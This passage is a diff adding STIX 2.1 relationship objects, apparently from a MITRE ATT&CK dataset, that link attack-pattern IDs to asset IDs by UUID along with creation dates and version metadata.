"relationship_type": "targets", + "source_ref": "attack-pattern--b0533c6e-8fea-4788-874f-b799cacc4b92", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--239a3f30-e465-4f50-b22b-2fbcc5e860d3", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--23ac4318-d64e-4d30-b313-55882150820a", + "created": "2024-06-26T14:46:24.437Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T14:46:24.437Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4a5b7ade-8bb5-4853-84ed-23f262002665", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--23c26560-64a3-4276-8a5c-b1894e98488e", + "created": "2024-06-26T13:37:52.947Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:37:52.947Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--23dac679-c865-49d6-8e44-06014515cecb", + "created": "2020-03-09T14:51:11.860Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--86a96bf6-cf8b-411c-aaeb-8959944d64f7", + "target_ref": "attack-pattern--40597f16-0963-4249-bf4c-ac93b7fb9807", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--241645c8-8c72-42fd-beb7-92b4de8f3493", + "created": "2024-06-21T14:12:20.277Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.277Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--eec23884-3fa1-4d8a-ac50-6f104d51e235", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--242681c1-8729-422d-9eb1-67f7d56b97b8", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--24270105-0582-4da4-b556-c128f895747f", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2448f5b3-1ed4-4811-be27-7732e6c7cdbf", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2452cc82-6ee0-4a98-a213-d5e3f3247e07", + "created": "2023-09-28T20:25:47.357Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:25:47.357Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--245b800d-30f4-4044-83b9-d06c5d7da531", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2474e9bc-b9d0-4d42-aff5-336f334df821", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--24793eaf-f0d8-4baf-ba3d-900b87cf464d", + "created": "2024-04-09T21:00:24.049Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-04-09T21:00:24.049Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2484ffc5-b86f-4f37-a230-22426bb8408c", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4fe28b27-b13c-453e-a386-c2ef362a573b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--248dc91e-9a8c-4db4-a8bc-81570555c17a", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2490c985-86d9-45f2-b30d-b0f187b312f7", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8e350c1d-ac79-4b5c-bd4e-7476d7e84ec5", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--24996854-e1bf-40f3-94ac-1f25e8a1720c", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--24a442f5-201a-4cbc-be17-ad22ef6970ff", + "created": "2024-06-27T09:41:25.633Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:41:25.633Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--24b6b21e-ab58-49b8-8cc2-ecbd9a8df663", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--24c341bb-5d16-4e3c-be75-dd54bfbcf6d4", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ea016b56-ae0e-47fe-967a-cc0ad51af67f", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--24d17e8f-0c0f-41d1-aa83-8b69b8d30be5", + "created": "2023-09-29T17:07:55.738Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:07:55.738Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--24e1f6cf-44c3-4a3f-9839-5cd6398cc0fe", + "created": "2023-09-28T20:10:06.838Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:10:06.838Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--24f4467a-bb51-48df-a873-7fc741445a8d", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--25003c87-d031-4f1b-8204-9223f7426d28", + "created": "2020-01-24T18:15:06.961Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--e5cc9e7a-e61a-46a1-b869-55fb6eab058e", + "target_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--250212f0-a149-4a14-af83-94f7fcedc021", + "created": "2023-09-28T20:26:29.934Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:26:29.934Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--25142e80-2ce3-4c56-aa21-a657c0532949", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--25281488-be20-4d83-89d1-1da7ea836037", + "created": "2023-09-29T17:40:47.898Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:40:47.898Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--2535d2ee-5951-46cb-959f-c4afb8e2503c", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--25631384-8e45-469c-b98a-a036268a359b", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b24e2a20-3b3d-4bf0-823b-1ed765398fb0", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--257958f5-7e29-4dc3-a74f-45eadafd20bb", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--257f7ea7-06da-44c4-b29c-406fd3903fa1", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--25855129-9ba8-4b16-a569-bd5cf53cd31c", + "created": "2024-06-21T14:12:20.271Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.271Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--613d08bc-e8f4-4791-80b0-c8b974340dfd", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--25a1bc49-9507-492b-9151-d9805c2171f4", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d2c4e5ea-dbdf-4113-805a-b1e2a337fb33", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--25a57c44-9314-43d4-aded-c2aa07882d4d", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9c99724c-a483-4d60-ad9d-7f004e42e8e8", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--25af098d-ed66-433b-bb46-a626895c1ce9", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--25b46428-46dd-4703-8b1c-25f0b2377453", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--25c10bfe-0c34-4b91-9da2-f84da10bd11a", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b24e2a20-3b3d-4bf0-823b-1ed765398fb0", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--25ca7826-9f46-45e4-97e8-c942f9a2611d", + "created": "2020-02-04T12:55:04.101Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--ba8e391f-14b5-496f-81f2-2d5ecd646c1c", + "target_ref": "attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--261319ef-9f93-4751-8706-902e4bb7c57a", + "created": "2024-06-26T13:43:51.422Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:43:51.422Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--94cb00a4-b295-4d06-aa2b-5653b9c1be9c", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + 